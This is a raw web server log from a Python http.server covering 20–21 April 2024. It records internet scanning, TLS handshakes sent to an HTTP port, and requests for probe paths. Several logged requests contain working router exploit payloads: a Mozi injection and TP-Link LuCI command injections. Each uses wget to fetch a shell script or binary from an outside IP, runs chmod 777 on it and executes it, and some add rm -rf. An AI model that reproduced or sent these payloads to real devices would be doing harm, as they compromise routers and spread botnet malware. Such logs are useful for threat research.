"/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.162', 31354) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 3.101.240.162 - - [20/Apr/2024 08:54:04] "GET / HTTP/1.0" 200 - 3.101.240.162 - - [20/Apr/2024 08:54:15] code 501, message Unsupported method ('POST') 3.101.240.162 - - [20/Apr/2024 08:54:15] code 404, message File not found 3.101.240.162 - - [20/Apr/2024 08:54:15] "POST /sdk HTTP/1.1" 501 - 3.101.240.162 - - [20/Apr/2024 08:54:15] "GET /nmaplowercheck1713567255 HTTP/1.1" 404 - 3.101.240.162 - - [20/Apr/2024 08:54:15] "GET / HTTP/1.0" 200 - 3.101.240.162 - - [20/Apr/2024 08:54:16] "GET / HTTP/1.1" 200 - 3.101.240.162 - - [20/Apr/2024 08:54:16] code 404, message File not found 3.101.240.162 - - [20/Apr/2024 08:54:16] "GET /HNAP1 HTTP/1.1" 404 - 3.101.240.162 - - [20/Apr/2024 08:54:16] code 404, message File not found 3.101.240.162 - - [20/Apr/2024 08:54:16] "GET /evox/about HTTP/1.1" 404 - 3.101.240.162 - - [20/Apr/2024 08:54:25] code 400, message Bad request version ("æa\\x9bÃ7IØK¨\\x88\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.162 - - [20/Apr/2024 08:54:25] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\x90ñ(i6\x93S`òe/P\x8a\x01\x05\x0c~mç¥Ð\x9fFÍ\x80ÁΣÉH?å <\x00SZa25\x11\x85çh\x93sUdÎßE\x16^s\x0dæa\x9bÃ7IØK¨\x88\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:26] code 400, message Bad request version ("*¸³EtÈ=*bÛ:m<\\x86\\x87z\\x94µéÇÐ)I!Rþ\\x8eË\\x88R±¹\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.162 - - [20/Apr/2024 08:54:26] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03µ´²Vu\x86)kqÀë\x9c´\x82ÇãMª\x08gûÚ\x14Õ\x1eß«úyüÔë *¸³EtÈ=*bÛ:m<\x86\x87z\x94µéÇÐ)I!Rþ\x8eË\x88R±¹\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:26] code 400, message Bad request version ("31\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.162 - - [20/Apr/2024 08:54:26] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03Ý\x13àz,§\x82½\x08*\x00M\x03õÀa¸\x16ê\x15»\x9f&ûö¢Ëb} ô\x14 íÃJ\x99IJûH^ÛWúóÎ:\x91ôá\x900hQX\x0db\x81âÇ^ 31\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:26] code 400, message Bad request version ("Û©Ì\\x06òà\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.162 - - [20/Apr/2024 08:54:26] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03âo9\x18!`\x87#ìe\x93\x88x8GÕø\x8d/Îná0µØ"Ç\x10Qs°ó ã\x82Xu+=\x95þtx*ü`LS'½J ¼ö\x94\x02,= Û©Ì\x06òà\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:27] code 400, message Bad request version ("\\x12:ÉÈêó§Öȸ«ìØÓ8Ø\\x8e¿ªð%9i§\\x95mQTFì¡0\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.162 - - [20/Apr/2024 08:54:27] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03É\x8b²ÅP\x1bYMÉ\x1cjyôY\x08ÀÕÐõÍ0,0P\x8cxo\x1cËõ\x07Z \x12:ÉÈêó§Öȸ«ìØÓ8Ø\x8e¿ªð%9i§\x95mQTFì¡0\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:27] code 400, message Bad request version ('£?\\x99ù\\x88ê±Ú?\\x9dס0\\x15\\x02">ò\\x97\\x0ew*\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À\\'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À') 3.101.240.162 - - [20/Apr/2024 08:54:27] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03Xz\x81v\x9b\x19õM\x8d òê\x08I@¼B\x1b\x06T\x9fA\x17Ä!cù\x90H\x85`L \x17´/IÔSZAÕ £?\x99ù\x88ê±Ú?\x9dס0\x15\x02">ò\x97\x0ew*\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:27] code 400, message Bad request version ("Õ\\x9c\\x11É~{~N÷\\xad\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.162 - - [20/Apr/2024 08:54:27] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\x8dlCÜKWÁg\x12Lþ#ÁW(¤KkZ\x80z\x81WÒ\x09¤kçÀ\x9b_Z á»6A;ù\x84jåÉé Eô\x89Ö6áÎ\x92¯ Õ\x9c\x11É~{~N÷­\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:28] code 400, message Bad request version ('\\x94\\x08ª') 3.101.240.162 - - [20/Apr/2024 08:54:28] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03ëª\x9e½Wî\x945­<\x86\x91äUuq\x9aB%ïc\x1a'f§\x9an\x0eÉ\x0dõ~ \x10GM\x09q÷ß\x1d\x94\x08ª" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:28] code 400, message Bad request version ('¹F\\x88\\x8eüA"k\\x8d\\x99\\x84¹8\\x8e|ÔÜAêsôÃ\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À\\'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À') 3.101.240.162 - - [20/Apr/2024 08:54:28] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\\\x91\x01\x0b`;\x04Á\x12h[\x9fBuµ\x84\x81¿cöh+|*Ôzì?\\m\x9e¥ 3/\x80¹³\x18ã«\x81[å \x0feIY³sG\x83Ì#\x03cû+K\x1e¨Ð\x06GG\x84äÁ\x075à1\x05 \x10\x09\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:29] code 400, message Bad request version ("À¦Yæ\\x96ú\\x0e\\x83\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.240.162 - - [20/Apr/2024 08:54:29] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x033¬N^\x9dC%\x1eå%<ó'Ð\x0f"³<3AzÄ`«§Ã\x18߬ìºÌ Ô\x8d\x16¶kY+V\x11ݳ«z(àÏKV\x1aàÆ\x86¾\x09À¦Yæ\x96ú\x0e\x83\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.240.162 - - [20/Apr/2024 08:54:29] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01ü\\x03\\x03\\x99\\x8f\\x8a\\x8e+)ÔG\\x03¥+¾_ï\\x9dÚý{!½£M\\x04eBrT\\x9bdÃkÊ') 3.101.240.162 - - [20/Apr/2024 08:54:29] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\x99\x8f\x8a\x8e+)ÔG\x03¥+¾_ï\x9dÚý{!½£M\x04eBrT\x9bdÃkÊ \x11\x14\x01M\x06\x0e\x0eª,p/6¤\x97PÞÒ¿Î2®%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$') 78.181.151.110 - - [20/Apr/2024 22:29:03] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 - 80.94.92.60 - - [20/Apr/2024 22:41:50] code 404, message File not found 80.94.92.60 - - [20/Apr/2024 22:41:50] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3Bcd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 198.235.24.220 - - [20/Apr/2024 23:03:06] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00î\\x01\\x00\\x00ê\\x03\\x03nè') 198.235.24.220 - - [20/Apr/2024 23:03:06] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03nè" 400 - 198.235.24.220 - - [20/Apr/2024 23:03:07] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.220 - - [20/Apr/2024 23:03:07] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03x>×´.a-gÉ\x86^oqä\x99̼G~\x16÷ù®\x80Rÿ\x0e\x1cÆÎ@\x99\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 64.227.147.54 - - [20/Apr/2024 23:22:35] "GET / HTTP/1.1" 200 - 64.227.147.54 - - [20/Apr/2024 23:22:36] code 404, message File not found 64.227.147.54 - - [20/Apr/2024 23:22:36] "GET /favicon.ico HTTP/1.1" 404 - 45.142.182.118 - - [20/Apr/2024 23:24:06] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [20/Apr/2024 23:44:32] code 404, message File not found 80.94.92.60 - - [20/Apr/2024 23:44:32] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3Bcd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 46.174.191.30 - - [20/Apr/2024 23:52:47] "GET / HTTP/1.0" 200 - 185.242.226.10 - - [20/Apr/2024 23:57:24] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [21/Apr/2024 00:08:39] code 404, message File not found 179.43.190.218 - - [21/Apr/2024 00:08:39] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 80.75.212.75 - - [21/Apr/2024 00:20:06] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [21/Apr/2024 00:20:06] "CONNECT www.google.com:443 HTTP/1.1" 501 - 117.248.62.18 - - [21/Apr/2024 00:23:29] code 400, message Bad HTTP/0.9 request type ('27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$') 117.248.62.18 - - [21/Apr/2024 00:23:29] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 - 80.94.92.60 - - [21/Apr/2024 01:18:16] "GET / HTTP/1.1" 200 - 179.43.191.18 - - [21/Apr/2024 01:24:58] code 404, message File not found 179.43.191.18 - - [21/Apr/2024 01:24:58] "GET /mailman/listinfo/mailman HTTP/1.1" 404 - 185.224.128.43 - - [21/Apr/2024 02:20:53] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [21/Apr/2024 02:39:39] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [21/Apr/2024 02:39:39] "CONNECT google.com:443 HTTP/1.1" 501 - 179.43.190.218 - - [21/Apr/2024 03:36:35] code 404, message File not found 179.43.190.218 - - [21/Apr/2024 03:36:35] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 45.156.129.46 - - [21/Apr/2024 04:11:37] "GET / HTTP/1.1" 200 - 45.83.66.45 - - [21/Apr/2024 06:33:45] "GET / HTTP/1.1" 200 - 45.83.65.4 - - [21/Apr/2024 06:33:46] code 404, message File not found 45.83.65.4 - - [21/Apr/2024 06:33:46] "GET /favicon.ico HTTP/1.1" 404 - 185.224.128.43 - - [21/Apr/2024 07:09:12] "GET / HTTP/1.1" 200 - 80.75.212.75 - - [21/Apr/2024 07:20:38] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [21/Apr/2024 07:20:38] "CONNECT www.google.com:443 HTTP/1.1" 501 - 83.97.73.245 - - [21/Apr/2024 07:34:49] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 107.151.243.170 - - [21/Apr/2024 07:39:57] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [21/Apr/2024 07:47:39] code 404, message File not found 179.43.190.218 - - [21/Apr/2024 07:47:39] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 87.121.69.52 - - [21/Apr/2024 08:06:17] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [21/Apr/2024 08:06:17] "CONNECT google.com:443 HTTP/1.1" 501 - 212.70.149.134 - - [21/Apr/2024 08:16:26] "GET / HTTP/1.0" 200 - 83.97.73.245 - - [21/Apr/2024 09:01:37] code 404, message File not found 83.97.73.245 - - [21/Apr/2024 09:01:37] "GET /actuator/gateway/routes HTTP/1.1" 404 - 179.43.191.18 - - [21/Apr/2024 11:06:35] code 404, message File not found 179.43.191.18 - - [21/Apr/2024 11:06:35] "GET /mailman/listinfo/mailman HTTP/1.1" 404 - 35.203.211.150 - - [21/Apr/2024 11:54:23] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [21/Apr/2024 12:10:37] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [21/Apr/2024 12:12:16] code 404, message File not found 179.43.190.218 - - [21/Apr/2024 12:12:16] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 115.216.238.64 - - [21/Apr/2024 12:18:23] code 501, message Unsupported method ('POST') 115.216.238.64 - - [21/Apr/2024 12:18:23] "POST /GponForm/diag_Form?images/ HTTP/1.1" 501 - 205.210.31.83 - - [21/Apr/2024 12:32:08] "GET / HTTP/1.0" 200 - 64.62.197.161 - - [21/Apr/2024 13:05:43] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03¸ÖÐiíuu\\x14x\\x12\\x9e·âqÙÎ\\x05Ä7Ã\\x8eÇ\\x96¬/ËÜC\\x0eÍãi\\x00\\x00\\x1aÀ/À+À\\x11À\\x07À\\x13À') 64.62.197.161 - - [21/Apr/2024 13:05:43] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03¸ÖÐiíuu\x14x\x12\x9e·âqÙÎ\x05Ä7Ã\x8eÇ\x96¬/ËÜC\x0eÍãi\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 198.235.24.193 - - [21/Apr/2024 13:51:41] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00î\\x01\\x00\\x00ê\\x03\\x03Q\\x87´v') 198.235.24.193 - - [21/Apr/2024 13:51:41] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03Q\x87´v" 400 - 198.235.24.193 - - [21/Apr/2024 13:51:42] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00Ê\\x01\\x00\\x00Æ\\x03\\x03Q#Ë\\x93\\x9b>\\x92»÷S°Ó`9ÇJ|Üö}\\x18Áa\\'\\x87\\x07\\x82\\x89"\\x81°T\\x00\\x00hÌ\\x14Ì\\x13À/À+À0À,À\\x11À\\x07À\\'À#À\\x13À') 198.235.24.193 - - [21/Apr/2024 13:51:42] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03Q#Ë\x93\x9b>\x92»÷S°Ó`9ÇJ|Üö}\x18Áa'\x87\x07\x82\x89"\x81°T\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 80.75.212.75 - - [21/Apr/2024 14:14:05] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [21/Apr/2024 14:14:05] "CONNECT www.google.com:443 HTTP/1.1" 501 - 87.121.69.52 - - [21/Apr/2024 14:15:39] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [21/Apr/2024 14:15:39] "CONNECT google.com:443 HTTP/1.1" 501 - 46.174.191.31 - - [21/Apr/2024 14:40:53] "GET / HTTP/1.0" 200 - 24.144.96.191 - - [21/Apr/2024 14:47:13] "GET / HTTP/1.1" 200 - 194.169.175.43 - - [21/Apr/2024 15:33:00] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.169.175.43 - - [21/Apr/2024 15:33:00] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 167.99.89.215 - - [21/Apr/2024 15:36:29] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x01þ\\x01\\x00\\x01ú\\x03\\x03Ê!ê8¸§\\x89{ÒÜ}ã=Í') 167.99.89.215 - - [21/Apr/2024 15:36:29] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03Ê!ê8¸§\x89{ÒÜ}ã=Í\x1d\x8a?\x86ó#\x84.\x87ÈKD®×ÿ`Ó\x99\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À" 400 - 179.43.191.18 - - [21/Apr/2024 16:00:23] code 404, message File not found 179.43.191.18 - - [21/Apr/2024 16:00:23] "GET /mailman/listinfo/mailman HTTP/1.1" 404 - 179.43.190.218 - - [21/Apr/2024 16:19:13] code 404, message File not found 179.43.190.218 - - [21/Apr/2024 16:19:13] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 80.94.92.60 - - [21/Apr/2024 16:32:49] code 501, message Unsupported method ('POST') 80.94.92.60 - - [21/Apr/2024 16:32:49] "POST /cgi-bin/jumpto.php?class=diagnosis&page=config_save&isphp=1 HTTP/1.1" 501 - 64.62.197.3 - - [21/Apr/2024 17:29:35] "GET / HTTP/1.1" 200 - 64.62.197.6 - - [21/Apr/2024 17:31:59] code 404, message File not found 64.62.197.6 - - [21/Apr/2024 17:31:59] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.4 - - [21/Apr/2024 17:32:42] code 404, message File not found 64.62.197.4 - - [21/Apr/2024 17:32:42] "GET /geoserver/web/ HTTP/1.1" 404 - 185.224.128.43 - - [21/Apr/2024 17:37:57] "GET / HTTP/1.1" 200 - 212.70.149.134 - - [21/Apr/2024 17:54:54] code 404, message File not found 212.70.149.134 - - [21/Apr/2024 17:54:54] "GET /cgi/conf.bin HTTP/1.1" 404 - 179.43.190.218 - - [21/Apr/2024 17:57:50] code 404, message File not found 179.43.190.218 - - [21/Apr/2024 17:57:50] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 80.94.92.60 - - [21/Apr/2024 18:18:56] "GET / HTTP/1.1" 200 - 194.48.251.17 - - [21/Apr/2024 18:22:51] code 404, message File not found 194.48.251.17 - - [21/Apr/2024 18:22:51] "GET /.env HTTP/1.1" 404 - 194.48.251.17 - - [21/Apr/2024 18:22:51] code 501, message Unsupported method ('POST') 194.48.251.17 - - [21/Apr/2024 18:22:51] "POST / HTTP/1.1" 501 - 138.68.224.69 - - [21/Apr/2024 18:33:48] code 501, message Unsupported method ('POST') 138.68.224.69 - - [21/Apr/2024 18:33:48] "POST /wp-login.php HTTP/1.1" 501 - 138.68.224.69 - - [21/Apr/2024 18:33:49] code 501, message Unsupported method ('POST') 138.68.224.69 - - [21/Apr/2024 18:33:49] "POST /wordpress/wp-login.php HTTP/1.1" 501 - 3.239.82.142 - - [21/Apr/2024 19:28:10] code 501, message Unsupported method ('POST') 3.239.82.142 - - [21/Apr/2024 19:28:10] "POST /wp-login.php HTTP/1.1" 501 - 3.239.82.142 - - [21/Apr/2024 19:28:10] code 501, message Unsupported method ('POST') 3.239.82.142 - - [21/Apr/2024 19:28:10] "POST /wordpress/wp-login.php HTTP/1.1" 501 - 194.50.16.190 - - [21/Apr/2024 20:20:04] "GET / HTTP/1.1" 200 - 152.42.176.18 - - [21/Apr/2024 20:23:18] code 404, message File not found 152.42.176.18 - - [21/Apr/2024 20:23:18] "GET http://httpbin.org/ip HTTP/1.1" 404 - 192.241.204.38 - - [21/Apr/2024 20:48:12] code 404, message File not found 192.241.204.38 - - [21/Apr/2024 20:48:12] "GET /portal/redlion HTTP/1.1" 404 - 107.170.245.9 - - [21/Apr/2024 20:55:14] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 